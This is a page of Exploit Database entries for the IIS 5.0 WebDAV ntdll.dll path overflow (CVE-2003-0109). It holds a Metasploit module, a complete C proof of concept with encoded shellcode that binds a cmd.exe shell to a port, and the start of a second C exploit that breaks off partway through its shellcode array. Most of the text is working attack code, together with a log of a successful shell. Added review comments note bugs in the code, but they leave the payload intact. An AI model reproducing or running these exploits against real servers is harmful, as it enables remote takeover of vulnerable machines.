EDB Verified : Yes
##
# $Id: ms03_007_ntdll_webdav.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit module for the ntdll.dll path overflow reached through IIS 5.0
# WebDAV (CVE-2003-0109 / MS03-007, see References).  Windows 2000 only; the
# single target brute-forces the return-address list kept in exploit().
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
# Module metadata.  The evasion options registered at the end narrow what
# HttpClient may do to the request (presumably because the URI itself carries
# the overflow and must keep its exact layout — confirm before relying on it).
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
'Description' => %q{
This exploits a buffer overflow in NTDLL.dll on Windows 2000
through the SEARCH WebDAV method in IIS. This particular
module only works against Windows 2000. It should have a
reasonable chance of success against any service pack.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
[ 'CVE', '2003-0109'],
[ 'OSVDB', '4467'],
[ 'BID', '7116'],
[ 'MSB', 'MS03-007']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic Brute Force', { } ],
],
'DisclosureDate' => 'May 30 2003',
'DefaultTarget' => 0))
register_evasion_options(
[
OptBool.new('invalid_search_request', [false, 'Replace the valid XML search with random data', 'false']),
# XXX - ugh, there has to be a better way to remove entries from an
# enum than overwriting the evalable enum option
OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none','hex-normal'], 'none'])
], self.class
)
deregister_options('HTTP::junk_params', 'HTTP::header_folding')
end
# Common vulnerability scanning tools report port 445/139
# due to how they test for the vulnerability. Remap this
# back to 80 for automated exploitation
#
# NOTE(review): rport is a plain local here, so the remap is never written
# back to datastore['RPORT'] and has no effect on the connection; the method
# always returns true.
def autofilter
rport = datastore['RPORT'].to_i
if ( rport == 139 or rport == 445 )
rport = 80
end
true
end
# Active check: sends a SEARCH whose URI is 65535 'x' bytes.  An IIS
# "Server Error(exception" page, or the server no longer answering a plain
# request afterwards, both count as Vulnerable — so on a vulnerable host the
# check itself may take IIS down.  Anything else is Safe.
def check
url = 'x' * 65535
xml =
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
response = send_request_cgi({
'uri' => '/' + url,
'ctype' => 'text/xml',
'method' => 'SEARCH',
'data' => xml
}, 5)
if (response and response.body =~ /Server Error\(exception/)
return Exploit::CheckCode::Vulnerable
end
# Did the server stop accepting requests?
begin
send_request_raw({'uri' => '/'}, 5)
rescue
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
# One SEARCH per candidate return address.  After each send the module polls
# 8 x 0.25 s for a session and returns as soon as one exists; if IIS stops
# answering it gives up instead of trying the remaining candidates.
def exploit
# verify the service is running up front
send_request_raw({'uri' => '/'}, 5)
# The targets in the most likely order they will work
targets =
[
# Almost Targeted :)
"\x4f\x4e", # =SP3
"\x41\x42", # ~SP0 ~SP2
"\x41\x43", # ~SP1, ~SP2
# Generic Bruteforce
"\x41\xc1",
"\x41\xc3",
"\x41\xc9",
"\x41\xca",
"\x41\xcb",
"\x41\xcc",
"\x41\xcd",
"\x41\xce",
"\x41\xcf",
"\x41\xd0",
]
xml =
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
# Evasion option: replace the well-formed body with random bytes
if datastore['invalid_search_request'] == true
xml = rand_text(rand(1024) + 32)
end
# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
# This decodes to "inc ecx"
url = 'A' * 65516
url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded
targets.each { |ret|
print_status("Trying return address 0x%.8x..." % Rex::Text.to_unicode(ret).unpack('V')[0])
url[ 283, 2 ] = ret
begin
send_request_cgi({
'uri' => '/' + url,
'ctype' => 'text/xml',
'method' => 'SEARCH',
'data' => xml
}, 5)
handler
rescue => e
print_error("Attempt failed: #{e}")
end
# Up to 2 s for the handler to report a session (the block parameter is unused)
1.upto(8) { |i|
select(nil,nil,nil,0.25)
return if self.session_created?
}
if !service_running?
print_error('Giving up, IIS must have completely crashed')
return
end
}
end
# Try connecting to the server up to 20 times, with a two second gap
# This gives the server time to recover after a failed exploit attempt
# Returns true on the first request that succeeds, false after 20 failures.
def service_running?
print_status('Checking if IIS is back up after a failed attempt...')
1.upto(20) {|i|
begin
send_request_raw({'uri' => '/'}, 5)
rescue
print_error("Connection failed (#{i} of 20)...")
select(nil,nil,nil,2)
next
end
return true
}
return false
end
end
Exploit Database EDB-ID : 2
Publication date : 2003-03-23 23h00 +00:00
Author : RoMaNSoFt
EDB Verified : Yes
/*************************************/
/* IIS 5.0 WebDAV -Proof of concept- */
/* [ Bug: CAN-2003-0109 ] */
/* By Roman Medina-Heigl Hernandez */
/* aka RoMaNSoFt <
[email protected]> */
/* Madrid, 23.Mar.2003 */
/* ================================= */
/* Public release. Version 1. */
/* --------------------------------- */
/*************************************/
/* ====================================================================
* --[ READ ME ]
*
* This exploit is mainly a proof of concept of the recently discovered ntdll.dll bug (which may be
* exploited in many other programs, not necessarily IIS). Practical exploitation is not as easy as
* expected due to difficult RET guessing mixed with possible IIS crashes (which makes RET brute
* forcing a tedious work). The shellcode included here will bind a cmd.exe shell to a given port
* at the victim machine so it could be problematic if that machine is protected behind a firewall.
* For all these reasons, the scope of this code is limited and mainly intended for educational
* purposes. I am not responsible for any damage caused by the use of this exploit code.
*
* The program sends a HTTP request like this:
*
* SEARCH /[nop] [ret][ret][ret] ... [ret] [nop][nop][nop][nop][nop] ... [nop] [jmpcode] HTTP/1.1
* {HTTP headers here}
* {HTTP body with webDAV content}
* 0x01 [shellcode]
*
* IIS converts the first ascii string ([nop]...[jmpcode]) to Unicode using UTF-16 encoding (for
* instance, 0x41 becomes 0x41 0x00, i.e. an extra 0x00 byte is added) and it is the resultant
* Unicode string the one producing the overflow. So at first glance, we cannot include code here
* (more on this later) because it would get corrupted by 0x00 (and other) inserted bytes. Not at
* least using the common method. Another problem that we will have to live with is our RET value
* being padded with null bytes, so if we use 0xabcd in our string, the real RET value (i.e. the
* one EIP will be overwritten with) would be 0x00ab00cd. This is an important restriction.
*
* We have two alternatives:
*
* 1) The easy one: find any occurrences of our ascii string (i.e. before it gets converted to
* the Unicode form) in process memory. Problem: normally we should find it by debugging the
* vulnerable application and then hardcode the found address (which will be the RET address)
* in our exploit code. This RET address is variable, even for the same version of OS and app
* (I mean, different instances of the same application in the same machine could make the
* guessed RET address invalid at different moments). Now add the restriction of RET value
* padded with null-bytes. Anyway, the main advantage of this method is that we will not have
* to deal with 0x00-padded shellcode.
*
* 2) The not so-easy one: you could insert an encoded shellcode in such a way that when the app
* expands the ascii string (with the encoded shellcode) to Unicode, a valid shellcode is
* automagically placed into memory. Please, refer to Chris Anley's "venetian exploit" paper
* to read more about this. Dave Aitel also has a good paper about this technique and indeed
* he released code written in Python to encode shellcode (I'm wondering if he will release a
* working tool for that purpose, since the actual code was released as part of a commercial
* product, so it cannot be run without buying the whole product, despite the module itself
* being free!). Problem: it is not so easy as the first method ;-) Advantage: when the over-
* flow happens, some registers may point to our Unicoded string (where our Unicoded-shellcode
* lives in), so we don't need to guess the address where shellcode will be placed and the
* chance of a successful exploitation is greatly improved. For instance, in this case, when
* IIS is overflowed, ECX register points to the Unicode string. The idea is then fill in
* RET value with the fixed address of code like "call %ecx". This code may be contained in
* any previously-loaded library, for example).
*
* Well, guess it... yes... I chose the easy method :-) Perhaps I will rewrite the exploit
* using method 2, but I cannot promise that.
*
* Let's see another problem of the method 1 (which I have used). Not all Unicode conversions
* result in a 0x00 byte being added. This is true for ascii characters lower or equal to 0x7f
* (except for some few special characters, I'm not sure). But our shellcode will have bytes
* greater than 0x7f value. So we don't know the exact length of the Unicoded-string containing
* our shellcode (some ascii chars will expand to more than 2 bytes, I think). As a result,
* sometimes the exploit may not work, because no exact length is matched. For instance, if you
* carry out experiments on this issue, you could see that IIS crashes (overflow occurs) when
* entering a query like SEARCH /AAAA...AAA HTTP/1.1, with 65535 A's. Same happens with 65536.
* But with different values seems NOT to work. So matching the exact length is important here!
*
* What I have done, it is to include a little "jumpcode" instead of the shellcode itself. The
* jumpcode is placed into the "critical" place and has a fixed length, so our string has always
* a fixed length, too. The "variable" part (the shellcode) is placed at the end of the HTTP
* request (so you can insert your own shellcode and remove the one I'm using here, with no apparent
* problem). To be precise, the end of the request will be: 0x01 [shellcode]. The 0x01 byte marks
* the beginning of the shellcode and it is used by the jumpcode to find the address where shell-
* code begins and jump into it. It is not possible to hardcode a relative jump, because HTTP
* headers have a variable length (think about the "Host:" header and you will understand what
* I'm saying). Well, really, the exploit could have calculated the relative jump itself (other
* problems arise like null-bytes possibly contained in the offset field) but I have preferred to
* use the 0x01 trick. It's my exploit, it's my choice :-)
*
* After launching the exploit, several things may happen:
* - the exploit is successful. You can connect to the bound port of victim machine and get a
* shell. Great. Remember that when you issue an "exit" command in the shell prompt, the pro-
* cess will be terminated. This implies that IIS could die.
* - exploit returns a "server not vulnerable" response. Really, the server may not be vulnerable
* or perhaps the SEARCH method used by the exploit is not permitted (the bug can still be
* exploited via GET, probably) or webDAV is disabled at all.
* - exploit did not get success (which is not strange, since it is not easy to guess RET value)
* but the server is vulnerable. IIS will probably not survive: a "net start w3svc" could be
* needed in the victim machine, in order to restart the WWW service.
*
* The following log shows a correct exploitation:
*
* roman@goliat:~/iis5webdav> gcc -o rs_iis rs_iis.c
* roman@goliat:~/iis5webdav> ./rs_iis roman
* [*] Resolving hostname ...
* [*] Attacking port 80 at roman (EIP = 0x00480004)...
* [*] Now open another console/shell and try to connect (telnet) to victim port 31337...
*
* roman@goliat:~/iis5webdav> telnet roman 31337
* Trying 192.168.0.247...
* Connected to roman.
* Escape character is '^]'.
* Microsoft Windows 2000 [Versi¢n 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
*
* I am not going to show logs for the faulty cases. I'm pretty sure you will see them very
* soon :-) But yes, the exploit works, perhaps a little fine-tuning may be required, though.
* So please, do NOT contact me telling that the exploit doesn't work or things like that. It
* worked for me and it will work for you, if you're not a script-kiddie. Try to attach to the
* IIS process (inetinfo.exe) with the help of a debugger (OllyDbg is my favourite) on the
* victim machine and then launch the exploit against it. Debugger will break when the first
* exception is produced. Now place a breakpoint in 0x00ab00cd (being 0xabcd the not-unicoded
* RET value) and resume execution until you reach that point. Finally, it's time to search
* the memory looking for our shellcode. It is nearly impossible (very low chance) that our
* shellcode is found at any 0x00**00**-form address (needed to bypass the RET restriction
* imposed by Unicode conversion) but no problem: you have a lot of NOPs before the shellcode
* where you could point to. If EIP is overwritten with the address of such a NOP, program flow
* will finish reaching our shellcode. Note also that among the two bytes of RET that we have some
* kind of control, the more important is the first one, i.e. the more significant. In other
* words, interesting RET values to try are: 0x0104, 0x0204, 0x0304, 0x0404, 0x0504, ...,
* and so on, till 0xff04. As you may have noticed, the last byte (0x04) is never changed because
* its weight is minimal (256 between aprox. 65000 NOP's is not appreciable).
*
*
* My best wishes,
* --Roman
*
* ===================================== --[ EOT ]-- ====================
*/
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
// Change to fit your need
#define RET 0x4804 // EIP = 0x00480004
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
// Don't change this
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
#define MAXBUF 100000
/*
* LoadLibraryA IT Address := 0100107C
* GetProcAddress IT Address := 01001034
*/
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
* xor al, al
* inc al
* repnz scasb
* jmp edi
*/
/* Static WebDAV SEARCH body.  main() advertises strlen(body) + strlen(shellcode)
 * as Content-Length and then appends body, a 0x01 marker, three NOPs and the
 * shellcode after the headers. */
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" \
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
/* Our code starts here */
/*
 * Entry point.  Usage: <target host> [target port] [bind port] [ret]
 *
 * Validates RET and the bind port for embedded null bytes, patches the port
 * and the two IAT addresses into shellcode[], connects to the target, builds
 * the SEARCH request laid out in the header comment, sends it, then reads the
 * reply: any response text is printed and reported as "NOT vulnerable", an
 * empty reply as "vulnerable but RET was wrong".
 *
 * Exits with a distinct negative code (-1 .. -7) on each failure path;
 * otherwise falls off the end of main() without an explicit return.
 */
int main (int argc, char **argv)
{
unsigned long ret;
unsigned short port;
int tport, bport, s, i, j, r, rt=0;
struct hostent *h;
struct sockaddr_in dst;
char buffer[MAXBUF]; /* ~100 KB request/response buffer on the stack */
if (argc < 2 || argc > 5)
{
printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <
[email protected]>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET);
exit(-1);
}
// Default target port = 80
if (argc > 2)
tport = atoi(argv[2]);
else
tport = 80;
// Default bind port = 31337
if (argc > 3)
bport = atoi(argv[3]);
else
bport = 31337;
// Default ret value = RET
if (argc > 4)
ret = strtoul(argv[4], NULL, 16);
else
ret = RET;
// Both RET bytes must be non-zero: each is widened to 0x00XX by the UTF-16
// conversion described in the header comment.
if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 )
{
fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n");
exit(-2);
}
// Shellcode patching
// The shellcode expects the network-order port masked with 0x99, the same
// mask applied to the two IAT addresses below.
port = htons(bport);
port ^= 0x9999;
if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) )
{
fprintf(stderr, "Binding-port contains null-byte. Use another port.\nAborted!\n");
exit(-3);
}
// NOTE(review): these stores alias shellcode[] through unsigned short/long
// pointers at odd offsets: they assume a little-endian host that tolerates
// unaligned access and violate strict aliasing.  memcpy() of the value would
// be the portable form.
*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
// If the last two items contain any null-bytes, exploit will fail.
// WARNING: this check is not performed here. Be careful and check it for yourself!
// Resolve hostname
printf("[*] Resolving hostname ...\n");
if ((h = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "%s: unknown hostname\n", argv[1]);
exit(-4);
}
// NOTE(review): dst is never zeroed, and bcopy()/gethostbyname() are legacy
// BSD, IPv4-only APIs.
bcopy(h->h_addr, &dst.sin_addr, h->h_length);
dst.sin_family = AF_INET;
dst.sin_port = htons(tport);
// Socket creation
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("Failed to create socket");
exit(-5);
}
// Connection
if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)
{
perror("Failed to connect");
exit(-6);
}
// Build malicious string...
// Prints the UTF-16-widened form of RET (0x00XX00YY), cf. header comment.
// NOTE(review): %x with unsigned long arguments; fine on ILP32, mismatched on LP64.
printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1], ((ret >> 8) & 0xff), ret & 0xff);
bzero(buffer, MAXBUF);
strcpy(buffer, "SEARCH /");
i = strlen(buffer);
buffer[i] = NOP; // Align for RET overwrite
// Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill some more bytes ;-)
// (same unaligned/aliasing caveat as the shellcode patching above)
for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;
// The rest is padded with NOP's. RET address should point to this zone!
// The URI is padded to a fixed 65535 bytes so its length is exact (see header).
for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;
// Then we skip the body of the HTTP request
memcpy(&buffer[j], jumpcode, strlen(jumpcode));
// Everything below is appended with strcpy(buffer+strlen(buffer), ...); this
// works only because buffer was zeroed and no piece contains a 0x00 byte.
strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
// NOTE(review): %d with size_t arguments (%zu).  Also, the 0x01 marker and the
// three NOPs appended below are not counted, so Content-Length is 4 bytes short
// of what is actually sent.
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
strcpy(buffer+strlen(buffer), body);
// This byte is used to mark the beginning of the shellcode
memset(buffer+strlen(buffer), 0x01, 1);
// And finally, we land into our shellcode
memset(buffer+strlen(buffer), NOP, 3);
// strcpy() stops at the first 0x00, which is why the null-byte checks above exist.
strcpy(buffer+strlen(buffer), shellcode);
// Send request
// (ssize_t compared with size_t: a -1 from send() still lands in the error branch)
if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
exit(-7);
}
printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport);
// Receive response
// NOTE(review): the receive size never shrinks as rt grows; it should be
// MAXBUF-1-rt, and the loop should stop once that reaches 0.  The author's
// own caveat below describes the resulting overflow.
while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)
rt += r;
// This code is not bullet-proof. An evil WWW server could return a response bigger than MAXBUF
// and an overflow would occur here. Yes, I'm lazy... :-)
buffer[rt] = '\0';
if (rt > 0)
printf("[*] Victim server issued the following %d bytes of response:\n--\n%s\n--\n[*] Server NOT vulnerable!\n", rt, buffer);
else
// NOTE(review): bport is passed but the format string has no conversion for it
// (harmless, but -Wformat flags it).
printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport);
close(s);
}
// milw0rm.com [2003-03-24]
Exploit Database EDB-ID : 51
Publication date : 2003-07-07 22h00 +00:00
Author : Schizoprenic
EDB Verified : Yes
/*
* IIS 5.0 WebDAV Exploit Xnuxer Lab
* By Schizoprenic, Copyright (c) 2003
* WebDAV exploit without netcat or telnet and with pretty magic number as RET
*/
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
/* Layout constants for the request built in main() and the patches it
 * applies to shellcode[] before sending.  The two 0x0100xxxx values are
 * hard-coded addresses (presumably from one particular build of the
 * target process; nothing on this page validates them) that main()
 * XOR-masks with 0x99999999 and stores at LOADL_OFFSET / GETPROC_OFFSET. */
#define RET 0xc9c9
/* Only the low 16 bits of RET are used: main() repeats it as an
 * unsigned short across roughly 2150 bytes of the oversized request-URI. */
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
/* Byte offsets into shellcode[] written by main(): the masked callback port
 * (2 bytes) and the two masked addresses above (4 bytes each). */
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
/* x86 NOP, used as filler inside the request line and in front of the payload. */
#define NOP 0x90
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
